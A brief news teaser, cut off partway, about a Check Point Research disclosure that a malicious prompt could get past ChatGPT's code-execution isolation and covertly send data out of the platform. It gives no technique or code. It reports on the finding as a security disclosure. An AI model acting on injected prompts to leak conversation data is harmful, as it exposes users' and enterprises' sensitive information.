India, April 1 -- A recent disclosure by Check Point Research has highlighted a critical weakness in the security assumptions underpinning modern generative AI systems, including ChatGPT. The findings suggest that, under certain conditions, a malicious prompt could bypass isolation safeguards and enable covert data exfiltration from within the platform's code execution environment.
The issue underscores a broader concern for enterprises increasingly relying on AI tools to process sensitive information. It points to a potential flaw in the trust model governing AI platforms, where users assume that data shared within a conversation remains contained unless explicitly authorised for external transmission. More broadly, it raises questions ...
Click here to read full article from source
To read the full article or to get the complete feed from this publication, please
Contact Us.